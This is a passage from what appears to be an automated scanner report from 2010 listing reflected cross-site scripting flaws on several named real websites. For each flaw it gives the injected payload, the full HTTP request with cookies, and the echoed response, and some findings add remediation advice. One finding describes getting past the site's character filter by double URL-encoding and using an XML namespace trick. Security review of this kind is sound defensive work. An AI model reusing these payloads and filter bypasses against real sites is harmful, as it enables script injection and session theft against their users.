The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 50f7d<script>alert(1)</script>abb9201ca97 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feListAds?search=50f7d<script>alert(1)</script>abb9201ca97&cat=561&listtype=1 HTTP/1.1 Host: bayareamarketplace.kaango.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Date: Mon, 15 Nov 2010 01:59:45 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache X-Powered-By: PHP/5.3.3 Connection: Close Content-Length: 43491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <p> Bay Area Marketplace:
0 search results for '50f7d<script>alert(1)</script>abb9201ca97' within 100 miles from San Jose, California
in category Autos: Services & Parts </p> ...[SNIP]...
3.25. http://bookit.com/us/california/san-francisco/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bookit.com
Path:
/us/california/san-francisco/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25fdd</script><script>alert(1)</script>6017cefd337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /us/california/san-francisco/?25fdd</script><script>alert(1)</script>6017cefd337=1 HTTP/1.1 Host: bookit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:09:01 GMT Server: Apache Set-Cookie: siteId=198; expires=Tue, 14-Dec-2010 23:09:01 GMT; path=/; domain=.bookit.com Expires: Sun, 14 Nov 2010 23:19:01 GMT Cache-Control: max-age=600, must-revalidate Connection: close Content-Type: text/html Content-Length: 762675
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>San Francisco Hotels: Book Your San Francisco California Hotel Online BookIt.co ...[SNIP]... <br>25fdd</script><script>alert(1)</script>6017cefd337=> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload def38%3balert(1)//121dfcfc6b0 was submitted in the c parameter. This input was echoed as def38;alert(1)//121dfcfc6b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; expires=Mon, 13-Dec-2010 01:07:17 GMT; path=/; domain=c7.zedo.com Set-Cookie: ZHO162,570def38;alert(1),21=1;expires=Tue, 16 Nov 2010 01:00:00 GMT;domain=.zedo.com;path=/; ETag: "a1a6d5-f92-48e2846698880" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Vary: Accept-Encoding X-Varnish: 408653166 Cache-Control: max-age=842 Date: Mon, 15 Nov 2010 01:07:17 GMT Connection: close Content-Length: 5041
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var zzStr="q=0;z="+Math.random();var zzSection=372;var zzPat='0';var zzIdx='29';
var zzNetwork=162;var zzChannel=570def38;alert(1)//121dfcfc6b0;var zzSection=372;var zzDim=21;
if(document.all){ if(document.documentElement&&document.documentElement.clientWidth&&document.documentElement.offsetWidth){ var yr2=document.documentElement.offsetHei ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf915"-alert(1)-"09447ce8dc5 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc/c5/fl.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5&z=115169\ HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1933 Content-Type: application/x-javascript ETag: "703b68d0-4429-48e2858f30440" X-Varnish: 408724450 408724126 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=113 Expires: Mon, 15 Nov 2010 02:53:10 GMT Date: Mon, 15 Nov 2010 02:51:17 GMT Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';
var zzhasAd;
var zzStr = ...[SNIP]... IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'> ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31bdf"-alert(1)-"a648b904fc1 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript ETag: "898b0b78-4239-48e2858f30440" Vary: Accept-Encoding X-Varnish: 1843423143 1843421748 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=109 Date: Mon, 15 Nov 2010 02:51:21 GMT Connection: close Content-Length: 1933
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';
var zzhasAd;
var zzStr = ...[SNIP]... IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/31bdf"-alert(1)-"a648b904fc1http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'> ...[SNIP]...
3.29. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c7.zedo.com
Path:
/jsc/c5/fl.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eeda'-alert(1)-'52d71231c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc/c5/fl.js?4eeda'-alert(1)-'52d71231c98=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 771 Content-Type: application/x-javascript ETag: "703b68d0-4429-48e2858f30440" X-Varnish: 408724450 408724126 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=1733 Expires: Mon, 15 Nov 2010 03:20:03 GMT Date: Mon, 15 Nov 2010 02:51:10 GMT Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d3e"-alert(1)-"04bae8b6b31 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript ETag: "898b0b78-4239-48e2858f30440" Vary: Accept-Encoding X-Varnish: 1843423143 1843421748 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=109 Date: Mon, 15 Nov 2010 02:51:21 GMT Connection: close Content-Length: 1933
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';
var zzhasAd;
var zzStr = ...[SNIP]... IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/39d3e"-alert(1)-"04bae8b6b31http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'> ...[SNIP]...
3.31. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c7.zedo.com
Path:
/lar/v10-003/c7/jsc/flr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f763'-alert(1)-'1a7b6ec85c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lar/v10-003/c7/jsc/flr.js?1f763'-alert(1)-'1a7b6ec85c8=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 784 Content-Type: application/x-javascript ETag: "898b0b78-4239-48e2858f30440" X-Varnish: 1843423143 1843421748 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=1729 Date: Mon, 15 Nov 2010 02:51:14 GMT Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 758c9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e23959522cb9 was submitted in the REST URL parameter 18. This input was echoed as 758c9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23959522cb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9baf<a>dc1d20d44e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 2df4e%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e212e11ba257 was submitted in the REST URL parameter 18. This input was echoed as 2df4e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>212e11ba257 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 101e4<a>9b600e0037f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
3.36. http://consumertipsonline.net/health/us4.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://consumertipsonline.net
Path:
/health/us4.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7593b\"><img src=a onerror=alert(1)>d68ba1043cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /health/us4.php?t=1239000/7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd098\ HTTP/1.1 Host: consumertipsonline.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:52:36 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 X-Powered-By: PHP/5.2.9 Connection: close Content-Type: text/html Content-Length: 45510
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 was submitted in the t parameter. This input was echoed as 3ea2e\"><img src=a onerror=alert(1)>88ccf899957 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /health/us4.php?t=1239000098\3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 HTTP/1.1 Host: consumertipsonline.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:52:34 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 X-Powered-By: PHP/5.2.9 Connection: close Content-Type: text/html Content-Length: 45484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The value of the b request parameter is copied into the HTML document as plain text between tags. The payload 2581e<script>alert(1)</script>b823be43aed was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 96c02<script>alert(1)</script>228aa39f1fa was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9fe88<script>alert(1)</script>fa305a07b2a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a HTTP/1.1 Host: ds.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sat, 12 Feb 2011 23:11:03 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 14 Nov 2010 23:11:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 23:11:03 GMT Connection: close
3.41. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac11"><script>alert(1)</script>811b9446da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8ac11"><script>alert(1)</script>811b9446da5=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?8ac11"><script>alert(1)</script>811b9446da5=1" /> ...[SNIP]...
3.42. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca30"><script>alert(1)</script>9fc7022dbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?bca30"><script>alert(1)</script>9fc7022dbe7=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?bca30"><script>alert(1)</script>9fc7022dbe7=1" /> ...[SNIP]...
3.43. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/performers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa537"><script>alert(1)</script>081b4c1c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /performers?aa537"><script>alert(1)</script>081b4c1c4b2=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/performers?aa537"><script>alert(1)</script>081b4c1c4b2=1" /> ...[SNIP]...
3.44. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33257"><script>alert(1)</script>16f8b094cda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
